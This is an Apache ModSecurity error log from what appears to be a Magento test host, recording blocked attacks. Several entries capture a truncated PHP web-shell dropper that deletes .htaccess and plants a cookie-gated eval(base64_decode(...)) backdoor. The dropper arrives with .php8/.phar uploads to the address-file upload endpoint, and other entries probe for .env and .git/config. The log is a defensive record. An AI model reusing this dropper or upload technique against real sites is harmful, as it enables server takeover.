[Sun Nov 23 02:53:16.448444 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.php8"] [unique_id "aSJpDMeatXoUO6wBiGn07AAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 02:53:16.451482 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.php8"] [unique_id "aSJpDMeatXoUO6wBiGn07AAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 02:53:16.451700 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.php8"] [unique_id "aSJpDMeatXoUO6wBiGn07AAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 20:31:45.025626 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Rule 7f0e07ab7be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.phar"] [unique_id "aSNhIW9UlIruL7JTxnUF4wAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 20:31:45.026125 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.phar"] [unique_id "aSNhIW9UlIruL7JTxnUF4wAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 20:31:45.028797 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.phar"] [unique_id "aSNhIW9UlIruL7JTxnUF4wAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 20:31:45.029024 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.phar"] [unique_id "aSNhIW9UlIruL7JTxnUF4wAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 20:31:46.054433 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: w788364f428d25.php8 found within FILES:custom_attributes[country_id]: w788364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSNhIm9UlIruL7JTxnUF5AAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/7/w788364f428d25.phar
[Sun Nov 23 20:31:46.055106 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSNhIm9UlIruL7JTxnUF5AAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/7/w788364f428d25.phar
[Sun Nov 23 20:31:46.055289 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSNhIm9UlIruL7JTxnUF5AAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/7/w788364f428d25.phar
[Sun Nov 23 20:31:46.901731 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Rule 7f0e07ab7be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.php8"] [unique_id "aSNhIm9UlIruL7JTxnUF5QAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 20:31:46.902229 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.php8"] [unique_id "aSNhIm9UlIruL7JTxnUF5QAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 20:31:46.904841 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.php8"] [unique_id "aSNhIm9UlIruL7JTxnUF5QAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 20:31:46.905067 2025] [:error] [pid 266343] [client 194.68.32.136:43666] [client 194.68.32.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.php8"] [unique_id "aSNhIm9UlIruL7JTxnUF5QAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Nov 24 07:03:33.209775 2025] [authz_core:error] [pid 290812] [client 64.23.218.208:38776] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 24 07:03:34.716984 2025] [:error] [pid 289419] [client 64.23.218.208:38802] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSP1Ntu678UZNKPYNh9a1AAAAAA"]
[Mon Nov 24 07:03:34.717226 2025] [:error] [pid 289419] [client 64.23.218.208:38802] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSP1Ntu678UZNKPYNh9a1AAAAAA"]
[Mon Nov 24 07:03:34.717399 2025] [:error] [pid 289419] [client 64.23.218.208:38802] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSP1Ntu678UZNKPYNh9a1AAAAAA"]
[Mon Nov 24 07:03:35.217386 2025] [:error] [pid 289423] [client 64.23.218.208:38808] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSP1N2QD9_sbehPhIhHhSgAAAAQ"]
[Mon Nov 24 07:03:35.217628 2025] [:error] [pid 289423] [client 64.23.218.208:38808] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSP1N2QD9_sbehPhIhHhSgAAAAQ"]
[Mon Nov 24 07:03:35.218136 2025] [:error] [pid 289423] [client 64.23.218.208:38808] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSP1N2QD9_sbehPhIhHhSgAAAAQ"]
[Mon Nov 24 07:03:35.719515 2025] [:error] [pid 289434] [client 64.23.218.208:38824] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSP1N0kegqg-SpMlpG6ZhAAAAAU"]
[Mon Nov 24 07:03:35.719751 2025] [:error] [pid 289434] [client 64.23.218.208:38824] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSP1N0kegqg-SpMlpG6ZhAAAAAU"]
[Mon Nov 24 07:03:35.719932 2025] [:error] [pid 289434] [client 64.23.218.208:38824] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSP1N0kegqg-SpMlpG6ZhAAAAAU"]
[Mon Nov 24 13:58:16.927267 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Rule 7fb02c096be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/v/qv88364f428d25.phar"] [unique_id "aSRWaA4k_W94gZNW8aYItAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Nov 24 13:58:16.927784 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/v/qv88364f428d25.phar"] [unique_id "aSRWaA4k_W94gZNW8aYItAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Nov 24 13:58:16.930271 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/v/qv88364f428d25.phar"] [unique_id "aSRWaA4k_W94gZNW8aYItAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Nov 24 13:58:16.930501 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/v/qv88364f428d25.phar"] [unique_id "aSRWaA4k_W94gZNW8aYItAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Nov 24 13:58:17.113101 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: qv88364f428d25.php8 found within FILES:custom_attributes[country_id]: qv88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSRWaQ4k_W94gZNW8aYItQAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/v/qv88364f428d25.phar
[Mon Nov 24 13:58:17.113810 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSRWaQ4k_W94gZNW8aYItQAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/v/qv88364f428d25.phar
[Mon Nov 24 13:58:17.113995 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSRWaQ4k_W94gZNW8aYItQAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/v/qv88364f428d25.phar
[Mon Nov 24 13:58:17.320315 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Rule 7fb02c096be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/v/qv88364f428d25.php8"] [unique_id "aSRWaQ4k_W94gZNW8aYItgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Nov 24 13:58:17.320853 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/v/qv88364f428d25.php8"] [unique_id "aSRWaQ4k_W94gZNW8aYItgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Nov 24 13:58:17.323803 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/v/qv88364f428d25.php8"] [unique_id "aSRWaQ4k_W94gZNW8aYItgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
